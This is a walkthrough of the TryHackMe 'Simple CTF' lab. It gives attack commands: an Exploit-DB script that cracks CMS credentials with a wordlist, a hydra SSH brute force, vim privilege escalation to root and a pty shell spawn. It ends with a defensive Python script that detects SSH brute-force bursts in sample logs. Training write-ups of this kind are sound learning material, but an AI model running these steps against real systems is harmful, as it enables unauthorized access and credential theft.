Simple CTF — Walkthrough

Today we are going to solve the TryHackMe machine Simple CTF.

First, connect to the THM network using the VPN and start the machine.

1. We will start with an Nmap scan

nmap -Pn <ip>

2. Use DirBuster to find directory and file names on the web server

We can see there are many directories; we start with /simple/

We can see the CMS version at the end of the page

3. Search Google for exploits based on the CMS version

We found a CVE matching our version

Based on that version we found the exploit on Exploit-DB

4. Download the exploit and edit it if any changes are required for the Python modules it imports

python 46635.py -u http://<ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

It will crack the username and password

5. Now, try to log in using SSH

ssh -p2222 mitch@<ip>

Check the user ID

id

6. Now, look for the user flag user.txt

cat user.txt

7. Here, we have to perform privilege escalation

8. Go to GTFOBins and search for vim

9. We got the root shell; to get an interactive shell we use a Python command

python -c 'import pty;pty.spawn("/bin/bash")'

10. Now look for the root flag

cd /root

ls

We found the flag in the /root folder

cat root.txt

Second Method:

  • Since we already know that FTP allows anonymous access
  • We will log in through FTP

ftp <ip>

  • Check for any sensitive information; we found a folder named 'pub'

ls

  • Check whether the folder contains any information

cd pub

  • We can see a file named 'ForMitch.txt'; open the file

cat ForMitch.txt

  • We can assume that one of the users is named Mitch. Now we will try to brute-force the SSH login using hydra

hydra -l mitch -P /usr/share/wordlists/rockyou.txt <ip> -s <port> -t 4 ssh

  • Since we have the username and password, we will log in through SSH, get the user flag, perform privilege escalation and obtain the root shell
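As a defender-side counterpart to the hydra step above (an added example, not part of the original walkthrough): the brute force leaves a burst of failed sshd logins for one account from one source, and this Python script, run over constructed auth.log lines, flags any source exceeding a failure threshold within a time window and notes whether a successful login followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (syslog format); not taken from the room.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 box sshd[1201]: Failed password for mitch from 10.0.0.5 port 50112 ssh2
Jan 10 12:00:02 box sshd[1202]: Failed password for mitch from 10.0.0.5 port 50113 ssh2
Jan 10 12:00:02 box sshd[1203]: Failed password for mitch from 10.0.0.5 port 50114 ssh2
Jan 10 12:00:03 box sshd[1204]: Failed password for mitch from 10.0.0.5 port 50115 ssh2
Jan 10 12:00:03 box sshd[1205]: Failed password for invalid user admin from 10.0.0.5 port 50116 ssh2
Jan 10 12:00:09 box sshd[1206]: Accepted password for mitch from 10.0.0.5 port 50120 ssh2
Jan 10 12:30:00 box sshd[1300]: Failed password for mitch from 10.0.0.9 port 41000 ssh2
Jan 10 12:45:00 box sshd[1301]: Failed password for mitch from 10.0.0.9 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse(log_text, year=2024):
    """Return [(timestamp, result, user, source_ip), ...] for sshd auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog lines carry no year, so one is assumed
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Map each source IP that produced >= threshold failures inside any
    window_seconds span to (peak_failures, success_seen_after_last_failure)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, _user, ip in parse(log_text):
        (failures if result == "Failed" else successes)[ip].append(ts)
    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over sorted failures
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            success_after = any(t >= times[-1] for t in successes.get(ip, []))
            alerts[ip] = (peak, success_after)
    return alerts
```

A burst followed by an accepted login (the second tuple element) is the case worth escalating; a couple of slow failures from one source, as from 10.0.0.9 here, stays below the threshold.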

This concludes the room and both flags have been captured!

Penetration Tester | WAPT | Bug Bounty Hunter